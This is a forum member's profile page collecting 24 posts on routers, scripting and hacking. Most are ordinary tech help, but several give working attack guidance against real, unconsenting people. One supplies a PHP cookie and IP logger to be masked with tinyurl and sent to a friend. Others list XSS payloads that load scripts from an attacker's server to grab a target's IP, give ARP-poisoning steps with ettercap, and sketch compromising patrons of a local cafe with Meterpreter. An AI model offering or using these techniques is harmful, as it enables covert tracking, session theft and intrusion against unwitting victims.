
DingleBerries
Dedicated Members
Posts: 1,291

Everything posted by DingleBerries

  1. Links are appreciated when referencing a talk... you know, for those who haven't seen it and may be able to shed light on the situation.
  2. Install "Tamper Data", a Firefox add-on. Go to the router config and start configuring a few things and looking at the POST commands going through. Create a script to login to the router and then do what you want. If anything, look at the CD that comes with them; that's how they set your SSID and what not without you logging into the web UI. I would help but I don't have either of those routers. I will look around and see what I can find.
  3. why when you can just:
     wget -rp -H http://www.website.com
     curl -LO http://website.com/[2000-2500].jpg
  4. Smoothwall + Python + Reading DD-WRT documentation + HTTP POST = a script to update all routers at once. Smoothwall as the base firewall, Python to create a script that validates and posts commands to the router. Use this as a rough example. No need in going out and buying more routers because if all you want to do is run "linux", well, that's what DD-WRT is. However, if you do go that path why not toss a few WRT54Gs my way :P. I'll be more than happy to help you script it then. EDIT: just thought about this, but if SSH is open on all the routers then you can just make a sh script to do this. Know that leaving SSH open is a bad security risk as well though. If the laptops are always in the same lab with the same router, apply MAC filtering. If you are using Windows you are in the suck since it doesn't look at an AP's MAC address, just the SSID. I'm sure there is a way to change this but I haven't played with the wireless function in Windows in a LONG time. If someone knows where Wireless Zero Config information is stored, the registry, a config.ini file, I wouldn't mind looking more into this fix.
  5. Run a script in front of the game, blocking all input, then kill it (or put it to sleep) after it has received the keys needed... think of GINA in Windows. The problem with that is that when the person dies or time runs out, how is the script going to restart itself? Best bet may be to redefine what keys the emulator uses, or block the input devices (there are settings somewhere, just don't feel like digging them up).
  6. More Complex: Step 1, grab ARP packet. Step 2, hex edit ARP packet. Step 3, set up box settings for proper redirection of connectivity, SSLStrip, etc. Step 4, File2Cable, doarp.sh. Step 5, sniff away, redirect, etc. EASY: open ettercap, ARP scan network, find active machines, go to host tab, add default gateway to target 1, victim to target 2, go to MITM tab and select ARP Poisoning.
  7. Or just upload your CSS and HTML for us to look at?
  8. I can tell you don't know what you are doing so I'm going to just spell it out. The Setup: Windows XP box with internet access, Apache, PHP, tinyurl.com. Method 1: Create a page, index.php, and add this code:

     <?php
     // Collect request details and append them to log.txt
     $useragent    = $_SERVER['HTTP_USER_AGENT'] ?? '';
     $cookie       = $_GET['cookie'] ?? '';
     $httpreferrer = $_SERVER['HTTP_REFERER'] ?? '';
     $HttpClientIP = $_SERVER['HTTP_CLIENT_IP'] ?? '';
     $RemAddr      = $_SERVER['REMOTE_ADDR'] ?? '';
     $CacheControl = $_SERVER['HTTP_CACHE_CONTROL'] ?? '';
     $XForward     = $_SERVER['HTTP_X_FORWARDED_FOR'] ?? '';
     $querystring  = $_SERVER['QUERY_STRING'] ?? '';
     $filename = 'log.txt';
     $somecontent = "User Agent: $useragent\n Cookie: $cookie\n HTTP Referrer: $httpreferrer\n HTTP Client IP: $HttpClientIP\n Remote Address: $RemAddr\n Cache Control: $CacheControl\n X Forward: $XForward\n Query String: $querystring\n";
     if (is_writable($filename)) {
         // Open in append mode so earlier entries are kept
         if (!$handle = fopen($filename, 'a')) {
             echo "Cannot open file ($filename)";
             exit;
         }
         if (fwrite($handle, $somecontent) === FALSE) {
             echo "Cannot write to file ($filename)";
             exit;
         }
         echo "Success, wrote ($somecontent) to file ($filename)";
         fclose($handle);
     } else {
         echo "The file $filename is not writable";
     }
     ?>

     Change the url at tinyurl.com and send it to him; that will log all the info you need to log.txt in the same directory. Method 2: Find a site vulnerable to an XSS attack. The .js is just an obfuscation technique; you can insert whatever you want, as long as the mark downloads it you are able to log that IP address. Set up an Apache/PHP server locally; you can go out and find a free service but if it's your friend and he knows you're doing it then why bother? Open GIMP/Photoshop and create a 1x1 pixel illustration, save it, host that on your server. Add the location of the pixel to the XSS monitor you host's file and watch who downloads it. Most of this has to do with social engineering because you are sending them a link in hopes they will open it. The second method works with emails as well if they choose to view images.
As for working this through Facebook, yes you can. There are sites out there dedicated to logging XSS vulns found, just find a fresh one and do this... easy as pie. Even with his IP I doubt you can do anything; if you have no clue as to how to find it, what are you going to do when you do have it? Metasploit is good for picking up some older vulnerabilities and fusking with them but what if all he is running on his computer is a browser? What are you going to do then? "Hacking" isn't a point and click type ordeal.
  9. Not going into detail but here are some starter points. For the XSS there are multiple methods. Yes you will need your own server, doesn't matter where it's hosted. <script SRC=http://yourpage.com/xss.js></SCRIPT> in the xss.js load the image or just replace that script with where the image is. <EMBED SRC="yourpage.com/xss.swf" AllowScriptAccess="always"></EMBED> This is a good one because you can get MySpace to load it; that way when he visits the MS page you can grab the IP. XSS is easy but it takes some social engineering. I suggest you start here and move up. The FTP trick is getting the guy to download and run a file, a lot harder than the XSS because you can use tinyurl to mask your XSS attack. Windows has a built in FTP upload command and that is why I say use FTP, but any way you can make it work, do it. You can also just use a connect back trojan for this as well, but then you are giving him your IP, not very stealthy.
  10. Python, C++, most all languages will do what you want. a = 1, b = 2. So read the name, translate, rename, just leave out the characters M, P, 3. If I had time tonight I would... still not, because it's a bad idea.
  11. On your server host an image, 1x1 pixel, and either through XSS or some other means have him load that image. Look in your logs and there is his IP. Write a simple script to FTP upload a file containing his IP. How you make that file is another means. Instant message him... Lots of ways to get this method to work, send file... Does he host anything on his computer, i.e. personal home page? Ping hispage.com. List goes on and on...
  12. Well without the mouse I cannot test this out myself but what I think you should do is.... In the program folder you will find a config.xml, open it. Edit the lines: <LED_COLOR>47871</LED_COLOR> <LED_INTENSITY>4</LED_INTENSITY> <LED_PULSATION>3</LED_PULSATION> Changing the application it uses will just require some hex editing.
  13. Hey, thanks for the reply but I was right all along... just left out a header :P, too little sleep. I knew all my code was right but it just wouldn't compile. Left out string.h.
  14. Ok I know this is horrible but I can't remember how to run DOS commands in a string. I've already looked and all I get are "use system()", but I can't. lol I got it.. #include <string>
  15. Can you link directly to the drivers and download? You didn't state the exact model and that would help a lot! Thanks
  16. Any other admin accounts on the box?
  17. You agreed to use their computers, therefore you agree to have everything you do logged by admins.
  18. I was thinking about this and I have a few questions. Are you setting up VPNs for individual VMs or to the main OS? I can't do diagrams but by having a VPN to the core of the machine the person now has access to the main OS and can root it very easily. There is a RH exploit for escalation of privileges. But by having a team to verify people individually you can "almost" eliminate this threat. What is the main OS going to be? Think of using some sort of steady state for that and saving the VMs and configs for users on a different partition. My idea looks a bit like:
      Partition 1 = Main OS
      Partition 2 = Swap (if Linux, better yet just use a swap file... unless we have access to the main OS)
      Partition 3 = VMs
      Partition 4 = User configs, VPN stuff
      Then if possible have Partition 4 mirrored or set to back up at certain intervals, that way if something happens you can restore it. On another note, this isn't going to be using your IP from your ISP is it? If so then be careful what you have on your network because you may get a few unsavoury persons attacking you directly. Other than that, great idea!
  19. Well rouguehart hasn't informed the forum about its whereabouts so the best we can do is hope it's still moving.
  20. That's my local con! I volunteered last year and plan on doing it again. I'm shy so volunteering helps me get out and talk to people. Everyone there is awesome, just don't throw a chair off the top of the building... The first thing you have to realise is that there are people who know a lot, but you can't let that deter you. You go to these because you enjoy the atmosphere, the people, and mainly just have a passion for this (plus there are a lot of great speakers). Not only do these events give you ideas, but they also help to teach you... I didn't know how Metasploit worked until operat0r put on a little demo for the owning of the boxes. If anything just email me and we can meet up. It's easier to get out and introduce yourself when you are in a group. Cheers, hope to see you there.
  21. A good antivirus that you didn't download from TPB. NOD32 is really good. I don't know of any programs that can do what iptables does for Linux, because I'm not a Windows user, but something like that for a good firewall. Turn off services you do not need. Disable JavaScript in Adobe and everything else for that matter. Do not run as Admin. Don't download warez. That's all I can think of. I never really had problems with virii when I used Windows but just use common sense. If you download a hack tool from a h4k3rz website then, yeah, it's probably backdoored. Use the tried and true programs.
  22. Metasploit's good if they are running a vulnerable service.. if not then Meterpreter and some social engineering comes into play. Ettercap with some filters and Meterpreter is a really good way to start. There are so many tools that it's hard to say, well get this and this and that. If you don't know how to use them then there is no use for them. Best thing to do is find a target, assess possible exploits, nmap, and go from there. Example: Local Cafe. What can you do? Well, for starters ARP. Next run Nmap and get a list of clients. Ok, few targets running Windows, let's check their ports out. Ok so port 80 is open... nothing of interest. Can we ARP poison the network? Yes? Ok let's do that. Now we redirect their traffic to my locally hosted site. Meterpreter some exploit to PHP or just have them download the file and RC back to you. There are other scenarios that are much more difficult but that is the easiest to explain, and possibly the easiest to exploit.
  23. I have a nice MD5 brute forcer but it doesn't support salts atm, not at that level yet; that could easily be made into a CUDA program. I'm going to start reading a bit and see if I can't get it to work.
  24. Not to mention you risk breaking the entire network.